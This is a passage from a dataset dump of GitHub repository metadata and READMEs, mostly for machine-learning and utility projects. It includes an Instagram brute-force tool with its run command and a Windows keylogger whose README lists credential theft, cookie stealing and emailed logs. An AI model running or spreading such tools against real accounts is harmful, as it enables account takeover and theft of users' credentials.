DIFFAUGMENT SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nTHE CLIP SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\nTHE PYTORCH-PRETRAINED-BIGGAN SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\n## Cite the paper\nIf this repository, the paper or any of its content is useful for your research, please cite:\n```\n@inproceedings{casanova2021instanceconditioned,\n title={Instance-Conditioned GAN}, \n author={Arantxa Casanova and Marl\u00e8ne Careil and Jakob Verbeek and Michal Drozdzal and Adriana Romero-Soriano},\n booktitle={Advances in Neural Information Processing Systems (NeurIPS)},\n year={2021}\n}\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "malllabiisc/CompGCN", "link": "https://github.com/malllabiisc/CompGCN", "tags": ["link-prediction", "relation-embeddings", "iclr2020", "graph-convolutional-networks", "deep-learning", "pytorch", "graph-representation-learning"], "stars": 514, "description": "ICLR 2020: Composition-Based Multi-Relational Graph Convolutional Networks", "lang": "Python", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jython/frozen-mirror", "link": "https://github.com/jython/frozen-mirror", "tags": [], "stars": 514, "description": "A Mirror of hg.python.org (now frozen). Please use jython/jython.", "lang": "Python", "repo_lang": "", "readme": "Jython: Python for the Java Platform\n------------------------------------\n\nWelcome to Jython @jython.version@.\n@snapshot.banner@\nThis is @readme.release@ release of version @jython.version.short@ of Jython.\n\nAlong with language and runtime compatibility with CPython 2.7, Jython 2.7\nprovides substantial support of the Python ecosystem. This includes built-in\nsupport of pip/setuptools (you can use with bin/pip) and a native launcher\nfor Windows (bin/jython.exe).\n\nJim Baker presented a talk at PyCon 2015 about Jython 2.7, including demos\nof new features: https://www.youtube.com/watch?v=hLm3garVQFo\n\nThis release was compiled on @os.name@ using @java.vendor@ Java\nversion @java.version@ and requires a minimum of Java @jdk.target.version@ to run.\n\nSee ACKNOWLEDGMENTS for details about Jython's copyright, license,\ncontributors, and mailing lists; and NEWS for detailed release notes,\nincluding bugs fixed, backwards breaking changes, and new features.\n\nThe developers extend their thanks to all who contributed to this release\nof Jython, through bug reports, patches, pull requests, documentation\nchanges, email and conversation in any media. We are grateful to the PSF for\ncontinuing practical help and support to the project.\n\nTesting\n-------\nYou can test your installation of Jython (not the standalone jar) by\nrunning the regression tests, with the command:\n\njython -m test.regrtest -e\n\nThe regression tests can take about fifty minutes. At the time of writing,\nthese tests are known to fail (spuriously) on an installed Jython:\n test___all__\n test_java_visibility\n test_jy_internals\n test_ssl_jy\nPlease report reproducible failures at http://bugs.jython.org .\n\n", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "importCTF/Instagram-Hacker", "link": "https://github.com/importCTF/Instagram-Hacker", "tags": ["hacking", "hacking-tool", "instagram", "python", "bruteforce", "bruteforce-attacks"], "stars": 514, "description": "This is an advanced script for Instagram bruteforce attacks. WARNING THIS IS A REAL TOOL!", "lang": "Python", "repo_lang": "", "readme": "# Instagram-Hacker\nThis is a script for Instagram bruteforce attacks. WARNING THIS IS A REAL TOOL!\n\n# Usage\n\n`python instagram.py username103 pass.lst`\n\n# Requirements\n\n[mechanize](https://pypi.python.org/pypi/mechanize/) install with: `pip install mechanize`\n\n[requests](https://pypi.python.org/pypi/requests/2.18.4) install with: `pip install requests`\n\n[Tor](https://www.torproject.org/docs/debian) install with: `sudo apt-get install tor`\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "firstlookmedia/pdf-redact-tools", "link": "https://github.com/firstlookmedia/pdf-redact-tools", "tags": [], "stars": 514, "description": "a set of tools to help with securely redacting and stripping metadata from documents before publishing", "lang": "Python", "repo_lang": "", "readme": "# PDF Redact Tools\n\n_Warning: This project is no longer maintained. A much better tool is [dangerzone](https://dangerzone.rocks)._\n\n![PDF Redact Tools](/logo.png)\n\nPDF Redact Tools helps with securely redacting and stripping metadata from documents before publishing.\n\n*Warning:* PDF Redact Tools uses ImageMagick to parse PDFs. While ImageMagick is a versatile tool, it has a history of some [terrible](https://imagetragick.com/) security bugs. A malicious PDF could exploit a bug in ImageMagick to take over your computer. If you're working with potentially malicious PDFs, it's safest to run them through PDF Redact Tools in an isolated environment, such as a virtual machine, or by using a tool such as the [Qubes PDF Converter](https://github.com/QubesOS/qubes-app-linux-pdf-converter) instead.\n\n## Quick Start\n\n### Mac OS X\n\n* Install [Homebrew](http://brew.sh/)\n* Open a terminal and type `$ brew install pdf-redact-tools`\n\n### Ubuntu\n\nYou can install PDF Redact Tools from this Ubuntu PPA:\n\n```sh\n$ sudo add-apt-repository ppa:micahflee/ppa\n$ sudo apt-get update\n$ sudo apt-get install pdf-redact-tools\n```\n\n### Other\n\nPDF Redact Tools isn't yet packaged in any GNU/Linux distributions yet, however it's easy to install by following the [build instructions](/BUILD.md). I haven't attempted to make this work in Windows.\n\n## How to Use\n\nTo use it, convert your original document to a PDF.\n\nThen start by exploding the PDF into PNG files:\n\n```sh\n$ pdf-redact-tools --explode example_document.pdf\n```\n\nThis will create a new folder in the same directory as the PDF called (in this case) `example_document_pages`, with a PNG for each page.\n\nEdit each page that needs redacting in graphics editing software like GIMP or Photoshop. Note that opening, editing, and saving a PNG will likely make it look slightly different than the other PNGs. For best results, open all PNGs and simply save and close the pages you don't need to edit.\n\nWhen you're done, combine the PNGs back into a flattened, informationless PDF:\n\n```sh\n$ pdf-redact-tools --merge example_document.pdf\n```\n\nIn this case, the final redacted PDF is called `example_document-final.pdf`.\n\nIf you don't need to redact anything, but you just want a new PDF that definitely doesn't contain malware or metadata, you can simply sanitize it.\n\n```sh\n$ pdf-redact-tools --sanitize untrusted.pdf\n```\n\nThe final document that you can trust is called `untrusted-final.pdf`.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "AUNaseef/protonup", "link": "https://github.com/AUNaseef/protonup", "tags": ["proton", "proton-ge-custom", "linux", "steam", "automation", "python"], "stars": 514, "description": "Install and Update Proton-GE", "lang": "Python", "repo_lang": "", "readme": "## Introduction\nCLI program and API to automate the installation and update of [GloriousEggroll](https://github.com/GloriousEggroll/)'s [Proton-GE](https://github.com/GloriousEggroll/proton-ge-custom)\n\n[![Downloads](https://pepy.tech/badge/protonup)](https://pepy.tech/project/protonup)\n\n## Installation\nInstall from Python Package Index\n```\npip3 install protonup\n```\nInstall from source\n```\ngit clone https://github.com/AUNaseef/protonup && cd protonup\npython3 setup.py install --user\n```\nIf you get a `command not found` error, add the following to your `~/.profile` (if it's not already present) and run `source ~/.profile`\n```\nif [ -d \"$HOME/.local/bin\" ] ; then\n PATH=\"$HOME/.local/bin:$PATH\"\nfi\n```\n\n## Usage\nSet your installation directory before running the program with `-d \"your/compatibilitytools.d/directory\"`\n\nExample:\n```\nprotonup -d \"~/.steam/root/compatibilitytools.d/\"\n```\n---\nTo update to the latest version, just run `protonup` from a command line\n\nExample:\n```\nprotonup\n```\n---\nList available versions with `--releases`\n\nExample:\n```\nprotonup --releases\n```\n---\nInstall a specific version with `-t \"version tag\"`\n\nExample:\n```\nprotonup -t 6.5-GE-2\n```\n---\nBy default the downloads are stored in a temporary folder. Change it with `-o \"custom/download/directory\"`\n\nExample:\n```\nprotonup -o ~/Downloads\n```\n---\nList existing installations with `-l`\n\nExample:\n```\nprotonup -l\n```\n---\nRemove existing installations with `-r \"version tag`\n\nExample:\n```\nprotonup -r 6.5-GE-2\n```\n---\nUse `--download` to download Proton-GE to the current working directory without installing it, you can override destination with `-o`\n\nExample:\n```\nprotonup --download\n```\n---\nUse `-y` toggle to carry out actions without any logging or interaction\n\nExample:\n```\nprotonup --download -o ~/Downloads -y\n```\n---\n### Restart Steam after making changes\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bai-shang/crnn_ctc_ocr_tf", "link": "https://github.com/bai-shang/crnn_ctc_ocr_tf", "tags": [], "stars": 513, "description": "Extremely simple implement for CRNN by Tensorflow", "lang": "Python", "repo_lang": "", "readme": "# crnn_ctc_ocr_tf\nThis software implements the Convolutional Recurrent Neural Network (CRNN), a combination of CNN, RNN and CTC loss for image-based sequence recognition tasks, such as scene text recognition and OCR. \n\nhttps://arxiv.org/abs/1507.05717 \n\nMore details for CRNN and CTC loss (in chinese): https://zhuanlan.zhihu.com/p/43534801 \n\n![](https://github.com/bai-shang/crnn_ctc_ocr_tf/blob/master/Arch.jpg?raw=true)\n\n***The crnn+seq2seq+attention ocr code can be found here [bai-shang/crnn_seq2seq_ocr_pytorch](https://github.com/bai-shang/crnn_seq2seq_ocr_pytorch)***\n\n# Dependencies\nAll dependencies should be installed are as follow: \n* Python3\n* tensorflow==1.15.0\n* opencv-python\n* numpy\n\nRequired packages can be installed with\n```bash\npip3 install -r requirements.txt\n``` \n\nNote: This code cannot run on the tensorflow2.0 since it's modified the 'tf.nn.ctc_loss' API.\n\n# Run demo\n\nAsume your current work directory is \"crnn_ctc_ocr_tf\"\uff1a\n```bash\ncd path/to/your/crnn_ctc_ocr_tf/\n```\nDowload pretrained model and extract it to your disc: [GoogleDrive](https://drive.google.com/file/d/1A3V7o3SKSiL3IHcTqc1jP4w58DuC8F9o/view?usp=sharing) . \n\nExport current work directory path into PYTHONPATH: \n\n```bash\nexport PYTHONPATH=$PYTHONPATH:./\n```\n\nRun inference demo:\n\n```bash\npython3 tools/inference_crnn_ctc.py \\\n --image_dir ./test_data/images/ --image_list ./test_data/image_list.txt \\\n --model_dir /path/to/your/bs_synth90k_model/ 2>/dev/null\n```\n\nResult is:\n```\nPredict 1_AFTERSHAVE_1509.jpg image as: aftershave\n```\n![1_AFTERSHAVE_1509.jpg](https://github.com/bai-shang/crnn_ctc_ocr_tf/blob/master/test_data/images/1_AFTERSHAVE_1509.jpg)\n```\nPredict 2_LARIAT_43420.jpg image as: lariat\n```\n![2_LARIAT_43420](https://github.com/bai-shang/crnn_ctc_ocr_tf/blob/master/test_data/images/2_LARIAT_43420.jpg)\n\n# Train a new model\n\n### Data Preparation\n* Firstly you need download [Synth90k](http://www.robots.ox.ac.uk/~vgg/data/text/) datasets and extract it into a folder. \n\n* Secondly supply a txt file to specify the relative path to the image data dir and it's corresponding text label. \n\nFor example: image_list.txt\n```bash\n90kDICT32px/1/2/373_coley_14845.jpg coley\n90kDICT32px/17/5/176_Nevadans_51437.jpg nevadans\n```\n* Then you suppose to convert your dataset to tfrecord format can be done by\n```bash\npython3 tools/create_crnn_ctc_tfrecord.py \\\n --image_dir path/to/90kDICT32px/ --anno_file path/to/image_list.txt --data_dir ./tfrecords/ \\\n --validation_split_fraction 0.1\n```\nNote: make sure that images can be read from the path you specificed. For example:\n```bash\npath/to/90kDICT32px/1/2/373_coley_14845.jpg\npath/to/90kDICT32px/17/5/176_Nevadans_51437.jpg\n.......\n```\nAll training images will be scaled into height 32pix and write to tfrecord file. \nThe dataset will be divided into train and validation set and you can change the parameter to control the ratio of them.\n\n#### Otherwise you can use the dowload_synth90k_and_create_tfrecord.sh script automatically create tfrecord:\n```\ncd ./data\nsh dowload_synth90k_and_create_tfrecord.sh\n```\n\n### Train model\n```bash\npython3 tools/train_crnn_ctc.py --data_dir ./tfrecords/ --model_dir ./model/ --batch_size 32\n```\nAfter several times of iteration you can check the output in terminal as follow: \n\n![](https://github.com/bai-shang/crnn_ctc_ocr_tf/blob/master/data/20180919022202.png?raw=true)\n\nDuring my experiment the loss drops as follow:\n![](https://github.com/bai-shang/crnn_ctc_ocr_tf/blob/master/data/20180919202432.png?raw=true)\n\n### Evaluate model\n```bash\npython3 tools/eval_crnn_ctc.py --data_dir ./tfrecords/ --model_dir ./model/ 2>/dev/null\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "duckietown/gym-duckietown", "link": "https://github.com/duckietown/gym-duckietown", "tags": ["openai-gym", "simulator", "reinforcement-learning", "robot", "imitation-learning"], "stars": 513, "description": "Self-driving car simulator for the Duckietown universe", "lang": "Python", "repo_lang": "", "readme": "# Gym-Duckietown\n\n[![Build Status](https://circleci.com/gh/duckietown/gym-duckietown/tree/master.svg?style=shield)](https://circleci.com/gh/duckietown/gym-duckietown/tree/master) [![Docker Hub](https://img.shields.io/docker/pulls/duckietown/gym-duckietown.svg)](https://hub.docker.com/r/duckietown/gym-duckietown)\n\n\n[Duckietown](http://duckietown.org/) self-driving car simulator environments for OpenAI Gym.\n\nPlease use this bibtex if you want to cite this repository in your publications:\n\n```\n@misc{gym_duckietown,\n author = {Chevalier-Boisvert, Maxime and Golemo, Florian and Cao, Yanjun and Mehta, Bhairav and Paull, Liam},\n title = {Duckietown Environments for OpenAI Gym},\n year = {2018},\n publisher = {GitHub},\n journal = {GitHub repository},\n howpublished = {\\url{https://github.com/duckietown/gym-duckietown}},\n}\n```\n\nThis simulator was created as part of work done at [Mila](https://mila.quebec/).\n\n

\n
\n

\n\n

\nWelcome to Duckietown!\n

\n\n## Introduction\n\nGym-Duckietown is a simulator for the [Duckietown](https://duckietown.org) Universe, written in pure Python/OpenGL (Pyglet). It places your agent, a Duckiebot, inside of an instance of a Duckietown: a loop of roads with turns, intersections, obstacles, Duckie pedestrians, and other Duckiebots. It can be a pretty hectic place!\n\nGym-Duckietown is fast, open, and incredibly customizable. What started as a lane-following simulator has evolved into a fully-functioning autonomous driving simulator that you can use to train and test your Machine Learning, Reinforcement Learning, Imitation Learning, or even classical robotics algorithms. Gym-Duckietown offers a wide range of tasks, from simple lane-following to full city navigation with dynamic obstacles. Gym-Duckietown also ships with features, wrappers, and tools that can help you bring your algorithms to the real robot, including [domain-randomization](https://blog.openai.com/spam-detection-in-the-physical-world/), accurate camera distortion, and differential-drive physics (and most importantly, realistic waddling).\n\n

\n
\n

\n\nThere are multiple registered gym environments, each corresponding to a different [map file](https://github.com/duckietown/gym-duckietown/tree/master/gym_duckietown/maps):\n- `Duckietown-straight_road-v0`\n- `Duckietown-4way-v0`\n- `Duckietown-udem1-v0`\n- `Duckietown-small_loop-v0`\n- `Duckietown-small_loop_cw-v0`\n- `Duckietown-zigzag_dists-v0`\n- `Duckietown-loop_obstacles-v0` (static obstacles in the road)\n- `Duckietown-loop_pedestrians-v0` (moving obstacles in the road)\n\nThe `MultiMap-v0` environment is essentially a [wrapper](https://github.com/duckietown/gym-duckietown/blob/master/gym_duckietown/envs/multimap_env.py) for the simulator which\nwill automatically cycle through all available [map files](https://github.com/duckietown/gym-duckietown/tree/master/gym_duckietown/maps). This makes it possible to train on\na variety of different maps at the same time, with the idea that training on a variety of\ndifferent scenarios will make for a more robust policy/model.\n\n`gym-duckietown` is an _accompanying_ simulator to real Duckiebots, which allow you to run your code on the real robot. We provide a domain randomization API, which can help you transfer your trained policies from simulation to real world. Without using a domain transfer method, your learned models will likely overfit to various aspects of the simulator, which won't transfer to the real world. When you deploy, you and your Duckiebot will be running around in circles trying to figure out what's going on.\n\n

\n
\n

\n\nThe `Duckiebot-v0` environment is meant to connect to software running on\na real Duckiebot and remotely control the robot. It is a tool to test that policies\ntrained in simulation can transfer to the real robot. If you want to\ncontrol your robot remotely with the `Duckiebot-v0` environment, you will need to\ninstall the software found in the [duck-remote-iface](https://github.com/maximecb/duck-remote-iface)\nrepository on your Duckiebot.\n\n

\n
\nDuckiebot-v0\n

\n\n## Installation\n\nRequirements:\n- Python 3.6+\n- OpenAI gym\n- NumPy\n- Pyglet\n- PyYAML\n- PyTorch\n\nYou can install all the dependencies except PyTorch with `pip3`:\n\n```\ngit clone https://github.com/duckietown/gym-duckietown.git\ncd gym-duckietown\npip3 install -e .\n```\n\nReinforcement learning code forked from [this repository](https://github.com/ikostrikov/pytorch-a2c-ppo-acktr)\nis included under [/pytorch_rl](/pytorch_rl). If you wish to use this code, you\nshould install [PyTorch](http://pytorch.org/).\n\n### Installation Using Conda (Alternative Method)\n\nAlternatively, you can install all the dependencies, including PyTorch, using Conda as follows. For those trying to use this package on MILA machines, this is the way to go:\n\n```\ngit clone https://github.com/duckietown/gym-duckietown.git\ncd gym-duckietown\nconda env create -f environment.yaml\n```\n\nPlease note that if you use Conda to install this package instead of pip, you will need to activate your Conda environment and add the package to your Python path before you can use it:\n\n```\nsource activate gym-duckietown\nexport PYTHONPATH=\"${PYTHONPATH}:`pwd`\"\n```\n\n### Docker Image\n\nThere is a pre-built Docker image available [on Docker Hub](https://hub.docker.com/r/duckietown/gym-duckietown), which also contains an installation of PyTorch.\n\n*Note that in order to get GPU acceleration, you should install and use [nvidia-docker 2.0](https://github.com/nvidia/nvidia-docker/wiki/Installation-(version-2.0)).*\n\nTo get started, pull the `duckietown/gym-duckietown` image from Docker Hub and open a shell in the container:\n\n```\nnvidia-docker pull duckietown/gym-duckietown && \\\nnvidia-docker run -it duckietown/gym-duckietown bash\n```\n\nThen create a virtual display:\n\n```\nXvfb :0 -screen 0 1024x768x24 -ac +extension GLX +render -noreset &> xvfb.log &\nexport DISPLAY=:0\n```\n\nNow, you are ready to start training a policy using RL:\n\n```\npython3 pytorch_rl/main.py \\\n --algo a2c \\\n --env-name Duckietown-loop_obstacles-v0 \\\n --lr 0.0002 \\\n --max-grad-norm 0.5 \\\n --no-vis \\\n --num-steps 20\n```\n\nIf you need to do so, you can build a Docker image by running the following command from the root directory of this repository:\n\n```\ndocker build . \\\n --file ./docker/standalone/Dockerfile \\\n --no-cache=true \\\n --network=host \\\n --tag \n```\n\n## Usage\n\n### Testing\n\nThere is a simple UI application which allows you to control the simulation or real robot manually. The `manual_control.py` application will launch the Gym environment, display camera images and send actions (keyboard commands) back to the simulator or robot. You can specify which map file to load with the `--map-name` argument:\n\n```\n./manual_control.py --env-name Duckietown-udem1-v0\n```\n\nThere is also a script to run automated tests (`run_tests.py`) and a script to gather performance metrics (`benchmark.py`).\n\n### Reinforcement Learning\n\nTo train a reinforcement learning agent, you can use the code provided under [/pytorch_rl](/pytorch_rl). I recommend using the A2C or ACKTR algorithms. A sample command to launch training is:\n\n```\npython3 pytorch_rl/main.py --no-vis --env-name Duckietown-small_loop-v0 --algo a2c --lr 0.0002 --max-grad-norm 0.5 --num-steps 20\n```\n\nThen, to visualize the results of training, you can run the following command. Note that you can do this while the training process is still running. Also note that if you are running this through SSH, you will need to enable X forwarding to get a display:\n\n```\npython3 pytorch_rl/enjoy.py --env-name Duckietown-small_loop-v0 --num-stack 1 --load-dir trained_models/a2c\n```\n\n### Imitation Learning\n\nThere is a script in the `experiments` directory which automatically generates a dataset of synthetic demonstrations. It uses hillclimbing to optimize the reward obtained, and outputs a JSON file:\n\n```\nexperiments/gen_demos.py --map-name loop_obstacles\n```\n\nThen you can start training an imitation learning model (conv net) with:\n\n```\nexperiments/train_imitation.py --map-name loop_obstacles\n```\n\nFinally, you can visualize what the trained model is doing with:\n\n```\nexperiments/control_imitation.py --map-name loop_obstacles\n```\n\nNote that it is possible to have `gen_demos.py` and `train_imitate.py` running simultaneously, so that training takes place while new demonstrations are being generated. You can also run `control_imitate.py` periodically during training to check on learning progress.\n\n## Design\n\n### Map File Format\n\nThe simulator supports a YAML-based file format which is designed to be easy to hand edit. See the [maps subdirectory](https://github.com/duckietown/gym-duckietown/blob/master/gym_duckietown/maps) for examples. Each map file has two main sections: a two-dimensional array of tiles, and a listing of objects to be placed around the map. The tiles are based on the [Duckietown appearance specification](https://docs.duckietown.org/daffy/opmanual_duckietown/out/duckietown_specs.html).\n\nThe available tile types are:\n- empty\n- straight\n- curve_left\n- curve_right\n- 3way_left (3-way intersection)\n- 3way_right\n- 4way (4-way intersection)\n- asphalt\n- grass\n- floor (office floor)\n\nThe available object types are:\n- barrier\n- cone (traffic cone)\n- duckie\n- duckiebot (model of a Duckietown robot)\n- tree\n- house\n- truck (delivery-style truck)\n- bus\n- building (multi-floor building)\n- sign_stop, sign_T_intersect, sign_yield, etc. (see [meshes subdirectory](https://github.com/duckietown/gym-duckietown/blob/master/gym_duckietown/meshes))\n\nAlthough the environment is rendered in 3D, the map is essentially two-dimensional. As such, objects coordinates are specified along two axes. The coordinates are rescaled based on the tile size, such that coordinates [0.5, 1.5] would mean middle of the first column of tiles, middle of the second row. Objects can have an `optional` flag set, which means that they randomly may or may not appear during training, as a form of domain randomization.\n\n### Observations\n\nThe observations are single camera images, as numpy arrays of size (120, 160, 3). These arrays contain unsigned 8-bit integer values in the [0, 255] range.\nThis image size was chosen because it is exactly one quarter of the 640x480 image resolution provided by the camera, which makes it fast and easy to scale down\nthe images. The choice of 8-bit integer values over floating-point values was made because the resulting images are smaller if stored on disk and faster to send over a networked connection.\n\n### Actions\n\nThe simulator uses continuous actions by default. Actions passed to the `step()` function should be numpy arrays containining two numbers between -1 and 1. These two numbers correspond to forward velocity, and a steering angle, respectively. A positive velocity makes the robot go forward, and a positive steering angle makes the robot turn left. There is also a [Gym wrapper class](https://github.com/duckietown/gym-duckietown/blob/master/gym_duckietown/wrappers.py) named `DiscreteWrapper` which allows you to use discrete actions (turn left, move forward, turn right) instead of continuous actions if you prefer.\n\n### Reward Function\n\nThe default reward function tries to encourage the agent to drive forward along the right lane in each tile. Each tile has an associated bezier curve defining the path the agent is expected to follow. The agent is rewarded for being as close to the curve as possible, and also for facing the same direction as the curve's tangent. The episode is terminated if the agent gets too far outside of a drivable tile, or if the `max_steps` parameter is exceeded. See the `step` function in [this source file](https://github.com/duckietown/gym-duckietown/blob/master/gym_duckietown/envs/simplesim_env.py).\n\n## Troubleshooting\n\nIf you run into problems of any kind, don't hesitate to [open an issue](https://github.com/duckietown/gym-duckietown/issues) on this repository. It's quite possible that you've run into some bug we aren't aware of. Please make sure to give some details about your system configuration (ie: PC or Max, operating system), and to paste the command you used to run the simulator, as well as the complete error message that was produced, if any.\n\n### ImportError: Library \"GLU\" not found\n\nYou may need to manually install packaged needed by Pyglet or OpenAI Gym on your system. The command you need to use will vary depending which OS you are running. For example, to install the glut package on Ubuntu:\n\n```\nsudo apt-get install freeglut3-dev\n```\n\nAnd on Fedora:\n\n```\nsudo dnf install freeglut-devel\n```\n\n### NoSuchDisplayException: Cannot connect to \"None\"\n\nIf you are connected through SSH, or running the simulator in a Docker image, you will need to use xvfb to create a virtual display in order to run the simulator. See the \"Running Headless\" subsection below.\n\n### Running headless\n\nThe simulator uses the OpenGL API to produce graphics. This requires an X11 display to be running, which can be problematic if you are trying to run training code through on SSH, or on a cluster. You can create a virtual display using [Xvfb](https://en.wikipedia.org/wiki/Xvfb). The instructions shown below illustrate this. Note, however, that these instructions are specific to MILA, look further down for instructions on an Ubuntu box:\n\n```\n# Reserve a Debian 9 machine with 12GB ram, 2 cores and a GPU on the cluster\nsinter --reservation=res_stretch --mem=12000 -c2 --gres=gpu\n\n# Activate the gym-duckietown Conda environment\nsource activate gym-duckietown\n\ncd gym-duckietown\n\n# Add the gym_duckietown package to your Python path\nexport PYTHONPATH=\"${PYTHONPATH}:`pwd`\"\n\n# Load the GLX library\n# This has to be done before starting Xvfb\nexport LD_LIBRARY_PATH=/Tmp/glx:$LD_LIBRARY_PATH\n\n# Create a virtual display with OpenGL support\nXvfb :$SLURM_JOB_ID -screen 0 1024x768x24 -ac +extension GLX +render -noreset &> xvfb.log &\nexport DISPLAY=:$SLURM_JOB_ID\n\n# You are now ready to train\n```\n\n### Running headless and training in a cloud based environment (AWS)\n\nWe recommend using the Ubuntu-based [Deep Learning AMI](https://aws.amazon.com/marketplace/pp/B077GCH38C) to provision your server which comes with all the deep learning libraries.\n\n```\n# Install xvfb\nsudo apt-get install xvfb mesa-utils -y\n\n# Remove the nvidia display drivers (this doesn't remove the CUDA drivers)\n# This is necessary as nvidia display doesn't play well with xvfb\nsudo nvidia-uninstall -y\n\n# Sanity check to make sure you still have CUDA driver and its version\nnvcc --version\n\n# Start xvfb\nXvfb :1 -screen 0 1024x768x24 -ac +extension GLX +render -noreset &> xvfb.log &\n\n# Export your display id\nexport DISPLAY=:1\n\n# Check if your display settings are valid\nglxinfo\n\n# You are now ready to train\n```\n\n### Poor performance, low frame rate\n\nIt's possible to improve the performance of the simulator by disabling Pyglet error-checking code. Export this environment variable before running the simulator:\n\n```\nexport PYGLET_DEBUG_GL=True\n```\n\n### RL training doesn't converge\n\nReinforcement learning algorithms are extremely sensitive to hyperparameters. Choosing the\nwrong set of parameters could prevent convergence completely, or lead to unstable performance over\ntraining. You will likely want to experiment. A learning rate that is too low can lead to no\nlearning happening. A learning rate that is too high can lead unstable performance throughout\ntraining or a suboptimal result.\n\nThe reward values are currently rescaled into the [0,1] range, because the RL code in\n`pytorch_rl` doesn't do reward clipping, and deals poorly with large reward values. Also\nnote that changing the reward function might mean you also have to retune your choice\nof hyperparameters.\n\n### Unknown encoder 'libx264' when using gym.wrappers.Monitor\n\nIt is possible to use `gym.wrappers.Monitor` to record videos of the agent performing a task. See [examples here](https://www.programcreek.com/python/example/100947/gym.wrappers.Monitor).\n\nThe libx264 error is due to a problem with the way ffmpeg is installed on some linux distributions. One possible way to circumvent this is to reinstall ffmpeg using conda:\n\n```\nconda install -c conda-forge ffmpeg\n```\n\nAlternatively, screencasting programs such as [Kazam](https://launchpad.net/kazam) can be used to record the graphical output of a single window.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mehulj94/Radium", "link": "https://github.com/mehulj94/Radium", "tags": ["python", "keylogger", "security"], "stars": 513, "description": "Python logger with multiple features.", "lang": "Python", "repo_lang": "", "readme": "```\n____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____\n _____ _ _ _ _\n | __ \\ | (_) | | | |\n | |__) |__ _ __| |_ _ _ _ __ ___ | | _____ _ _| | ___ __ _ __ _ ___ _ __\n | _ // _` |/ _` | | | | | '_ ` _ \\ | |/ / _ \\ | | | |/ _ \\ / _` |/ _` |/ _ \\ '__|\n | | \\ \\ (_| | (_| | | |_| | | | | | | | < __/ |_| | | (_) | (_| | (_| | __/ |\n |_| \\_\\__,_|\\__,_|_|\\__,_|_| |_| |_| |_|\\_\\___|\\__, |_|\\___/ \\__, |\\__, |\\___|_|\n __/ | __/ | __/ |\n |___/ |___/ |___/\n____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____\n\n--> Coded by: Mehul Jain\n--> For windows only\n\n____ ____ ____ ____ ____ ____ ____\n ______ _\n | ____| | |\n | |__ ___ __ _| |_ _ _ _ __ ___ ___\n | __/ _ \\/ _` | __| | | | '__/ _ \\/ __|\n | | | __/ (_| | |_| |_| | | | __/\\__ \\\n |_| \\___|\\__,_|\\__|\\__,_|_| \\___||___/\n____ ____ ____ ____ ____ ____ ____\n\n--> Applications and keystrokes logging\n--> Screenshot logging\n--> Drive tree structure\n--> Logs sending by email\n--> Password Recovery for\n \u2022 Chrome\n \u2022 Mozilla\n \u2022 Filezilla\n \u2022 Core FTP\n \u2022 CyberDuck\n \u2022 FTPNavigator\n \u2022 WinSCP\n \u2022 Outlook\n \u2022 Putty\n \u2022 Skype\n \u2022 Generic Network\n--> Cookie stealer\n--> Keylogger stub update mechanism\n--> Gather system information\n \u2022 Internal and External IP\n \u2022 Ipconfig /all output\n \u2022 Platform\n____ ____ ____ ____ ____\n _ _ _____ ___ _____ _____\n| | | / ___|/ _ \\| __ \\| ___|\n| | | \\ `--./ /_\\ \\ | 